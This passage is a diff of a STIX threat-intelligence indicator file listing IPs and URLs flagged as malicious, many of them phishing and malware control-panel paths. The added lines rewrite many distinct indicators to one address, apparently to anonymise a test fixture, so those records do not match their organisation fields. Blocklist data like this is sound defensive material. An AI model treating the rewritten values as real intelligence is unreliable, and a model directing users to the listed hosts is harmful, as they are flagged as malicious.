176.107.160.43","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '176.107.160.43']","type":"indicator","valid_from":"2020-01-25T03:00:27.279Z"} +{"created":"2020-01-25T03:00:27.279Z","description":"TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime","id":"indicator--7abc3f41-e952-481f-8bf7-7b52af05451f","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-62"],"modified":"2020-01-25T03:00:27.279Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-25T03:00:27.279Z"} {"created":"2020-01-25T03:00:29.248Z","description":"TS ID: 55253484340; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--72334129-8d1c-4cac-bde6-2d5d6316e266","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-25T03:00:29.248Z","name":"mal_url: http://newfoundfriend.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://newfoundfriend.xyz/login']","type":"indicator","valid_from":"2020-01-25T03:00:29.248Z"} {"created":"2020-01-25T03:01:03.628Z","description":"TS ID: 55253484360; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--a3f8f1e3-77c5-442d-a918-5d3d800a8357","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T03:01:03.628Z","name":"mal_url: http://officelog.org/inc/js/jstree/bi/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/bi/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T03:01:03.628Z"} {"created":"2020-01-25T03:01:03.65Z","description":"TS ID: 55253484355; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime","id":"indicator--49bac194-cefe-4c31-81eb-cc81a3a3bb26","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-89"],"modified":"2020-01-25T03:01:03.65Z","name":"mal_url: http://officelog.org/inc/js/jstree/vic/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://officelog.org/inc/js/jstree/vic/panel/admin.php']","type":"indicator","valid_from":"2020-01-25T03:01:03.65Z"} -{"created":"2020-01-26T02:54:41.651Z","description":"TS ID: 55256890160; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--ec5f9f49-249b-4fc4-bb91-849c892c7453","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:54:41.651Z","name":"mal_url: http://45.139.236.48/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.139.236.48/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.651Z"} +{"created":"2020-01-26T02:54:41.651Z","description":"TS ID: 55256890160; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--ec5f9f49-249b-4fc4-bb91-849c892c7453","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:54:41.651Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.651Z"} {"created":"2020-01-26T02:54:41.675Z","description":"TS ID: 55256890149; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--3e082be1-f6be-45f6-811b-5e63e2a596c5","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-91"],"modified":"2020-01-26T02:54:41.675Z","name":"mal_url: http://privatepp.club/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://privatepp.club/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.675Z"} {"created":"2020-01-26T02:54:41.705Z","description":"TS ID: 55256890147; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--95774d83-e0e1-45e4-ab1c-1bb27588fa92","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-74"],"modified":"2020-01-26T02:54:41.705Z","name":"mal_url: http://109.94.208.144/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://109.94.208.144/login']","type":"indicator","valid_from":"2020-01-26T02:54:41.705Z"} -{"created":"2020-01-26T02:55:15.583Z","description":"TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--0149e0f7-629c-41c5-a1e7-144b3c22d362","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-01-26T02:55:15.583Z","name":"mal_url: http://45.14.50.207/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.14.50.207/panel/admin.php']","type":"indicator","valid_from":"2020-01-26T02:55:15.583Z"} +{"created":"2020-01-26T02:55:15.583Z","description":"TS ID: 55256890123; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--0149e0f7-629c-41c5-a1e7-144b3c22d362","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-32"],"modified":"2020-01-26T02:55:15.583Z","name":"mal_url: http://89.160.20.156/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/panel/admin.php']","type":"indicator","valid_from":"2020-01-26T02:55:15.583Z"} {"created":"2020-01-26T02:55:15.785Z","description":"TS ID: 55256890140; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--751f6e49-92d5-4ff4-9245-870a49dce478","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:15.785Z","name":"mal_url: http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://molmarsl.com/leks/five/PvqDq929BSx_A_D_M1n_a.php']","type":"indicator","valid_from":"2020-01-26T02:55:15.785Z"} {"created":"2020-01-26T02:55:22.112Z","description":"TS ID: 55256890166; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--e0bdcebe-2f97-4f8f-ad51-0b0c06b5071c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:22.112Z","name":"mal_url: http://pecunia110011.at/iteat/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pecunia110011.at/iteat/']","type":"indicator","valid_from":"2020-01-26T02:55:22.112Z"} -{"created":"2020-01-26T02:55:31.348Z","description":"TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime","id":"indicator--82f02b81-cfae-4bee-b85d-daf900c93936","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-26T02:55:31.348Z","name":"mal_url: http://188.127.230.249/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://188.127.230.249/login']","type":"indicator","valid_from":"2020-01-26T02:55:31.348Z"} +{"created":"2020-01-26T02:55:31.348Z","description":"TS ID: 55256890144; iType: mal_url; State: active; Org: Telecommunication Systems, LLC; Source: CyberCrime","id":"indicator--82f02b81-cfae-4bee-b85d-daf900c93936","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-69"],"modified":"2020-01-26T02:55:31.348Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:55:31.348Z"} {"created":"2020-01-26T02:55:32.119Z","description":"TS ID: 55256890158; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--1e540e5a-6fa3-4758-ab61-0d7692fb3d96","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-26T02:55:32.119Z","name":"mal_url: http://jor1.berbagsansa.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jor1.berbagsansa.com/login']","type":"indicator","valid_from":"2020-01-26T02:55:32.119Z"} -{"created":"2020-01-26T02:55:33.623Z","description":"TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--cbfc3b5d-645b-4114-ab89-7ab5b745d230","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-48"],"modified":"2020-01-26T02:55:33.623Z","name":"mal_url: http://92.63.192.190/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.192.190/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.623Z"} -{"created":"2020-01-26T02:55:33.646Z","description":"TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime","id":"indicator--f4cf51da-17db-4d9b-bb65-efeb1373f01b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-01-26T02:55:33.646Z","name":"mal_url: http://190.14.38.202/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://190.14.38.202/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.646Z"} -{"created":"2020-01-26T02:55:33.681Z","description":"TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--6e4e6382-002d-473a-a635-cc00d4917353","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-26T02:55:33.681Z","name":"mal_url: http://45.132.104.20/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://45.132.104.20/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.681Z"} +{"created":"2020-01-26T02:55:33.623Z","description":"TS ID: 55256890152; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--cbfc3b5d-645b-4114-ab89-7ab5b745d230","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-48"],"modified":"2020-01-26T02:55:33.623Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.623Z"} +{"created":"2020-01-26T02:55:33.646Z","description":"TS ID: 55256890143; iType: mal_url; State: active; Org: Offshore Racks S.A; Source: CyberCrime","id":"indicator--f4cf51da-17db-4d9b-bb65-efeb1373f01b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-21"],"modified":"2020-01-26T02:55:33.646Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.646Z"} +{"created":"2020-01-26T02:55:33.681Z","description":"TS ID: 55256890162; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--6e4e6382-002d-473a-a635-cc00d4917353","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-67"],"modified":"2020-01-26T02:55:33.681Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.681Z"} {"created":"2020-01-26T02:55:33.738Z","description":"TS ID: 55256890138; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime","id":"indicator--33552aa0-5a5a-47a6-b529-a810dcf8c9af","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-28"],"modified":"2020-01-26T02:55:33.738Z","name":"mal_url: http://aboutworld.info/manage/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://aboutworld.info/manage/admin.php']","type":"indicator","valid_from":"2020-01-26T02:55:33.738Z"} -{"created":"2020-01-26T02:55:33.959Z","description":"TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime","id":"indicator--cd8459e5-367f-46b2-91e7-9893c766091a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-26T02:55:33.959Z","name":"mal_url: http://176.113.115.205/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://176.113.115.205/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.959Z"} +{"created":"2020-01-26T02:55:33.959Z","description":"TS ID: 55256890146; iType: mal_url; State: active; Org: Dzinet Ltd.; Source: CyberCrime","id":"indicator--cd8459e5-367f-46b2-91e7-9893c766091a","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-26T02:55:33.959Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:55:33.959Z"} {"created":"2020-01-26T02:55:33.984Z","description":"TS ID: 55256890128; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--274a9145-93f7-4146-a879-68fce2fc1188","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-26T02:55:33.984Z","name":"mal_url: http://10121.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://10121.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:33.984Z"} {"created":"2020-01-26T02:55:34.637Z","description":"TS ID: 55256890132; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--ea0abbe1-3033-4549-8ba0-626f43807986","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-26T02:55:34.637Z","name":"mal_url: http://1926.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://1926.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:34.637Z"} -{"created":"2020-01-26T02:55:44.765Z","description":"TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--c7c3a0d7-fccd-4bc0-9011-a6c91f967402","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-26T02:55:44.765Z","name":"mal_ip: 45.139.236.6","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '45.139.236.6']","type":"indicator","valid_from":"2020-01-26T02:55:44.765Z"} -{"created":"2020-01-26T02:55:48.315Z","description":"TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--383708ec-c15c-400a-94fc-40d6ac5ab8e3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:48.315Z","name":"mal_ip: 92.63.197.185","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '92.63.197.185']","type":"indicator","valid_from":"2020-01-26T02:55:48.315Z"} +{"created":"2020-01-26T02:55:44.765Z","description":"TS ID: 55256890120; iType: mal_ip; State: active; Source: CyberCrime","id":"indicator--c7c3a0d7-fccd-4bc0-9011-a6c91f967402","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-76"],"modified":"2020-01-26T02:55:44.765Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-26T02:55:44.765Z"} +{"created":"2020-01-26T02:55:48.315Z","description":"TS ID: 55256890150; iType: mal_ip; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--383708ec-c15c-400a-94fc-40d6ac5ab8e3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:48.315Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-26T02:55:48.315Z"} {"created":"2020-01-26T02:55:48.35Z","description":"TS ID: 55256890136; iType: mal_url; State: active; Org: GoDaddy.com, LLC; Source: CyberCrime","id":"indicator--14c3d4da-f364-4af0-96ba-ce8959da560b","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-26T02:55:48.35Z","name":"mal_url: http://185-24-53-218.com/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://185-24-53-218.com/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:48.35Z"} {"created":"2020-01-26T02:55:58.711Z","description":"TS ID: 55256890133; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--64655563-a4ad-4097-8cda-68c7bcc461f4","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:55:58.711Z","name":"mal_url: http://1410.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://1410.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:55:58.711Z"} {"created":"2020-01-26T02:56:23.739Z","description":"TS ID: 55256890139; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--5ab7883f-17c2-4cc7-b854-33f8d4bc6b1e","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-71"],"modified":"2020-01-26T02:56:23.739Z","name":"mal_url: http://nortonlilly.info/geli/login.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://nortonlilly.info/geli/login.php']","type":"indicator","valid_from":"2020-01-26T02:56:23.739Z"} {"created":"2020-01-26T02:56:23.79Z","description":"TS ID: 55256890131; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--3417c349-153d-4002-92dd-1093893f3180","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-81"],"modified":"2020-01-26T02:56:23.79Z","name":"mal_url: http://2208.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://2208.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:56:23.79Z"} -{"created":"2020-01-26T02:56:23.857Z","description":"TS ID: 55256890126; iType: mal_ip; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--00ae9f9a-03ce-415c-bb7a-49b6c486ac5d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-01-26T02:56:23.857Z","name":"mal_ip: 96.125.163.13","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '96.125.163.13']","type":"indicator","valid_from":"2020-01-26T02:56:23.857Z"} +{"created":"2020-01-26T02:56:23.857Z","description":"TS ID: 55256890126; iType: mal_ip; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--00ae9f9a-03ce-415c-bb7a-49b6c486ac5d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-53"],"modified":"2020-01-26T02:56:23.857Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-26T02:56:23.857Z"} {"created":"2020-01-26T02:56:29.981Z","description":"TS ID: 55256890129; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--dba2c4a2-6ad5-455c-b14a-b437d32ef6a3","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:56:29.981Z","name":"mal_url: http://1012.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://1012.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:56:29.981Z"} {"created":"2020-01-26T02:56:32.609Z","description":"TS ID: 55256890141; iType: mal_url; State: active; Org: H4Y Technologies LLC; Source: CyberCrime","id":"indicator--5049f714-5462-4f8d-8b13-d95024d477ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-87"],"modified":"2020-01-26T02:56:32.609Z","name":"mal_url: http://coupondemo.dynamicinnovation.net/ren/index.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://coupondemo.dynamicinnovation.net/ren/index.php']","type":"indicator","valid_from":"2020-01-26T02:56:32.609Z"} {"created":"2020-01-26T02:56:33.504Z","description":"TS ID: 55256890156; iType: mal_url; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--b476b4e0-387e-4cc6-8b93-437e05c9099c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-84"],"modified":"2020-01-26T02:56:33.504Z","name":"mal_url: http://51.38.140.2/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://51.38.140.2/login']","type":"indicator","valid_from":"2020-01-26T02:56:33.504Z"} {"created":"2020-01-26T02:56:37.688Z","description":"TS ID: 55256890163; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime","id":"indicator--27e994c3-5ee2-4f8b-9fc0-30ca4fc226ab","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-93"],"modified":"2020-01-26T02:56:37.688Z","name":"mal_url: http://baxarex228.xyz/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://baxarex228.xyz/login']","type":"indicator","valid_from":"2020-01-26T02:56:37.688Z"} -{"created":"2020-01-26T02:56:40.17Z","description":"TS ID: 55256890124; iType: mal_ip; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--67020df4-8210-4e8f-afe0-4d44ccd8800d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-01-26T02:56:40.17Z","name":"mal_ip: 185.222.202.91","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '185.222.202.91']","type":"indicator","valid_from":"2020-01-26T02:56:40.17Z"} -{"created":"2020-01-26T02:56:49.862Z","description":"TS ID: 55256890165; iType: mal_ip; State: active; Org: Tencent Building, Kejizhongyi Avenue; Source: CyberCrime","id":"indicator--f57e1196-0c96-4988-89f9-0b9d7301b524","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-26T02:56:49.862Z","name":"mal_ip: 49.51.171.215","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '49.51.171.215']","type":"indicator","valid_from":"2020-01-26T02:56:49.862Z"} -{"created":"2020-01-26T02:56:49.9Z","description":"TS ID: 55256890154; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--9797500e-6f8d-444c-bc86-e8e4581de7ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-01-26T02:56:49.9Z","name":"mal_ip: 51.89.138.152","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '51.89.138.152']","type":"indicator","valid_from":"2020-01-26T02:56:49.9Z"} +{"created":"2020-01-26T02:56:40.17Z","description":"TS ID: 55256890124; iType: mal_ip; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--67020df4-8210-4e8f-afe0-4d44ccd8800d","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-77"],"modified":"2020-01-26T02:56:40.17Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-26T02:56:40.17Z"} +{"created":"2020-01-26T02:56:49.862Z","description":"TS ID: 55256890165; iType: mal_ip; State: active; Org: Tencent Building, Kejizhongyi Avenue; Source: CyberCrime","id":"indicator--f57e1196-0c96-4988-89f9-0b9d7301b524","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-26T02:56:49.862Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-26T02:56:49.862Z"} +{"created":"2020-01-26T02:56:49.9Z","description":"TS ID: 55256890154; iType: mal_ip; State: active; Org: OVH SAS; Source: CyberCrime","id":"indicator--9797500e-6f8d-444c-bc86-e8e4581de7ce","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-73"],"modified":"2020-01-26T02:56:49.9Z","name":"mal_ip: 89.160.20.156","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[ipv4-addr:value = '89.160.20.156']","type":"indicator","valid_from":"2020-01-26T02:56:49.9Z"} {"created":"2020-01-26T02:56:49.93Z","description":"TS ID: 55256890130; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--8fb33d6a-4ed9-4c5a-9a8e-d7fc7e77b9d6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-85"],"modified":"2020-01-26T02:56:49.93Z","name":"mal_url: http://0409.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://0409.165-227-83-163.site/admin/']","type":"indicator","valid_from":"2020-01-26T02:56:49.93Z"} {"created":"2020-01-26T02:57:03.544Z","description":"TS ID: 55256890157; iType: mal_url; State: active; Source: CyberCrime","id":"indicator--96012440-e95d-46f0-9b70-3f495f4bab32","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-82"],"modified":"2020-01-26T02:57:03.544Z","name":"mal_url: http://jor1.mirtakala.com/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://jor1.mirtakala.com/login']","type":"indicator","valid_from":"2020-01-26T02:57:03.544Z"} -{"created":"2020-01-26T02:57:10.525Z","description":"TS ID: 55256890151; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--707777c2-d621-4fc8-a44b-6ee28a712ff6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:57:10.525Z","name":"mal_url: http://92.63.197.185/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://92.63.197.185/login']","type":"indicator","valid_from":"2020-01-26T02:57:10.525Z"} +{"created":"2020-01-26T02:57:10.525Z","description":"TS ID: 55256890151; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime","id":"indicator--707777c2-d621-4fc8-a44b-6ee28a712ff6","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-86"],"modified":"2020-01-26T02:57:10.525Z","name":"mal_url: http://89.160.20.156/login","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://89.160.20.156/login']","type":"indicator","valid_from":"2020-01-26T02:57:10.525Z"} {"created":"2020-01-26T02:57:10.571Z","description":"TS ID: 55256890135; iType: mal_url; State: active; Org: Global Data Networks LLC; Source: CyberCrime","id":"indicator--275f3354-1d9c-4167-9f1a-abb06bb0f138","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-88"],"modified":"2020-01-26T02:57:10.571Z","name":"mal_url: http://pnumbrero3.ru/soft/panel/admin.php","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 'http://pnumbrero3.ru/soft/panel/admin.php']","type":"indicator","valid_from":"2020-01-26T02:57:10.571Z"} {"created":"2020-01-26T02:57:14.057Z","description":"TS ID: 55256890127; iType: mal_url; State: active; Org: Websitewelcome.com; Source: CyberCrime","id":"indicator--b449e457-5327-40a2-8bda-0167c219490c","labels":["malicious-activity","threatstream-severity-medium","threatstream-confidence-83"],"modified":"2020-01-26T02:57:14.057Z","name":"mal_url: http://10122.165-227-83-163.site/admin/","object_marking_refs":["marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da"],"pattern":"[url:value = 